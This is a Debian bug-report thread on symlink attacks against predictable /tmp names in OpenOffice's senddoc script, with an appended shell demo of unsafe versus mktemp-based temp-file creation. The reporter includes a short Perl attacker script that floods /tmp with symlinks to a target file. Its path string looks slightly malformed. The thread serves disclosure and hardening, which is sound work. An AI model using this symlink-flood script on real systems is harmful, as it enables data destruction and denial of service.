
Bug#496361: The possibility of attack with the help of symlinks in some Debian packages



On 06:13 Mon 25 Aug, Rene Engelhard wrote:
RE> Hi,

RE> Dmitry E. Oboukhov wrote:
RE>> For example if a script uses in its work a temp file which is created
RE>> in the /tmp directory, then every user can create a symlink with the same
RE>> name in this directory in order to destroy or rewrite some system
RE>> or user file. A symlink attack may also lead not only to data
RE>> destruction but to denial of service as well.
RE>> 
RE>> Even if you create files or directories with the help of the 'RANDOM'
RE>> function or pid(), then your system is not protected. An attacker can create many
RE>> symlinks in order to destroy your data or create a 'denial of service'
RE>> for your package scripts.
RE> [...]
RE>> Binary-package: openoffice.org-common (1:2.4.1-6)
RE>>     file: /usr/lib/openoffice/program/senddoc

RE> I guess you mean this snippet in the mutt handling part of senddoc?
    $ grep -A5 -B5 /tmp/ /usr/lib/openoffice/program/senddoc
    #!/bin/sh
    URI_ENCODE="`dirname $0`/uri-encode"
    
    echo "$@" > /tmp/log.obr.$$
    echo "$#" >> /tmp/log.obr.$$
    
    # tries to locate the executable specified 
    # as first parameter in the user's path.
    which() {
        if [ ! -z "$1" ]; then

example for attacker script:

#!...perl

$file_for_attack='/path/to/file';

while(1)
{
    exit unless fork;
    symlink $file_for_attack, "/tmp//tmp/log.obr.$_" for ($$ .. $$+10000);
}

RE> [...]
RE> --body)
RE> TEMPLATE="`basename $0`.mutt.XXXXXXXX"
RE> BODY=`mktemp -q -t ${TEMPLATE}`
RE> echo "$2" > $BODY
RE> shift
RE> [...]
RE> x-terminal-emulator -e ${MAILER} \
RE> ${FROM:+-e} ${FROM:+"set from=\"${FROM}\""} \
RE> ${CC:+-c} ${CC:+"${CC}"} \
RE> ${BCC:+-b} ${BCC:+"${BCC}"} \
RE> ${SUBJECT:+-s} ${SUBJECT:+"${SUBJECT}"} \
RE> ${BODY:+-i} ${BODY:+"${BODY}"} \
RE> ${ATTACH:+-a} ${ATTACH:+"${ATTACH}"} \
RE> ${TO:+"${TO}"} &
RE> rm -f $BODY
RE> [...]

RE> I so far thought mktemp was safe enough? (of course, we get
RE> senddoc.mutt.<number>, but...

RE> Regards,

RE> Rene
--

. ''`. Dmitry E. Oboukhov
: :'  : unera@debian.org
`. `~' GPGKey: 1024D / F8E26537 2006-11-21
  `- 1B23 D4F8 8EC0 D902 0555  E438 AB8C 00CF F8E2 6537
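Added example, not part of this bug report and not code from senddoc: it puts the predictable-name pattern from the grep output above (`echo "$@" > /tmp/log.obr.$$`) beside the mktemp-based pattern Rene quotes from the mutt branch, and runs both against a constructed symlink in a private scratch directory. mktemp creates the file itself with O_CREAT|O_EXCL and mode 0600 under a name with a random suffix, so a link planted in advance is never followed; that is why the `/tmp/log.obr.$$` lines, not the `mktemp -q -t` line, are the exposure. The function names, the scratch directory and the "victim" file are this example's own.

```sh
#!/bin/sh
# Added example (not from the bug report or from senddoc): the predictable
# "/tmp/log.obr.$$" write next to a mktemp-based write, exercised against
# a pre-placed symlink in a throwaway directory.

# Vulnerable pattern: the script picks the name, and ">" opens whatever is
# already at that path, following a symlink if one was planted there.
# $1 is the directory (stands in for /tmp); the remaining arguments are
# the data to log.
unsafe_log() {
    dir=$1; shift
    logfile="$dir/log.obr.$$"        # PID-based name: guessable
    echo "$@" > "$logfile"
    printf '%s\n' "$logfile"
}

# Hardened pattern: let mktemp create the file. The template gets a random
# suffix and the file is opened with O_EXCL, so mktemp fails instead of
# reusing anything that already sits at that name. Abort if mktemp fails
# or if what came back is not a regular, non-symlink file.
safe_log() {
    dir=$1; shift
    logfile=$(mktemp "$dir/log.obr.XXXXXXXX") || return 1
    if [ -L "$logfile" ] || [ ! -f "$logfile" ]; then
        rm -f -- "$logfile"
        return 1
    fi
    echo "$@" > "$logfile"
    printf '%s\n' "$logfile"
}

# Self-contained demonstration with constructed data: a "victim" file and a
# symlink sitting at exactly the name unsafe_log() will choose for this PID.
# Prints "<victim after unsafe write>|<victim after safe write>".
demo() {
    scratch=$(mktemp -d) || return 1
    printf 'important data\n' > "$scratch/victim"
    ln -s "$scratch/victim" "$scratch/log.obr.$$"

    unsafe_log "$scratch" hello >/dev/null
    unsafe_result=$(cat "$scratch/victim")    # victim now reads "hello"

    printf 'important data\n' > "$scratch/victim"
    safe_log "$scratch" hello >/dev/null
    safe_result=$(cat "$scratch/victim")      # victim untouched

    rm -rf -- "$scratch"
    printf '%s|%s\n' "$unsafe_result" "$safe_result"
}
```

Running `demo` prints `hello|important data`: the fixed-name write went through the planted link and overwrote the victim, while the mktemp write landed in a fresh file. The post-creation `-L`/`-f` check in `safe_log` is a sanity check, not the protection; the protection is that the name is chosen and the file created atomically by mktemp, so there is no window between picking the name and opening it.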
